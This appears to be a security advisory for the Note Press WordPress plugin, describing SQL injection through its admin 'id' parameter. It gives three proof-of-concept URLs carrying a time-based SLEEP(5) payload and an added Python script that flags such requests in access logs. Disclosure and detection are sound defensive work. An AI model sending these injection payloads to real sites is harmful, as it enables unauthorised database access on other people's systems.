The plugin does not sanitise and escape the id parameter before using it in various SQL statements via the admin dashboard, leading to SQL injection.
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=view&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=delete&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
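An added detection example (not part of the original advisory or of the plugin's code): it scans web access logs for requests to the Note Press admin page whose id is not a plain integer, which is the shape of the proof-of-concept requests above. The log lines and the names `suspicious_id` and `scan` are constructed for illustration; the page name and the view, edit and delete actions are taken from the proof of concept.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs, times and sizes are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=Note_Press-Main-Menu&action=view&id=17 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt) HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=Note_Press-Main-Menu&action=delete&id=17&id=abc HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin.php?page=other-plugin&id=abc HTTP/1.1" 200 900
203.0.113.9 - - [01/Jan/2024:10:03:00 +0000] "GET /wp-admin/admin.php?page=Note_Press-Main-Menu HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ACTIONS = {"view", "edit", "delete"}  # actions named in the advisory's proof of concept

def suspicious_id(url):
    """Return the decoded id value if the request targets the Note Press admin
    page with an id that is not a plain decimal integer, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if query.get("page") != ["Note_Press-Main-Menu"]:
        return None
    if not set(query.get("action", [])) & ACTIONS:
        return None
    for value in query.get("id", []):  # check every copy of a repeated parameter
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan(log_text):
    """Return (client_ip, decoded_id) for every flagged request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_id(m.group(1))
        if bad is not None:
            hits.append((line.split()[0], bad))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}: non-integer id on Note Press admin page: {value!r}")
```

Because the affected pages sit behind the admin dashboard, a hit also identifies an authenticated session worth reviewing.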
| CPE | Name | Operator | Version |
|---|---|---|---|
| | note-press | eq | * |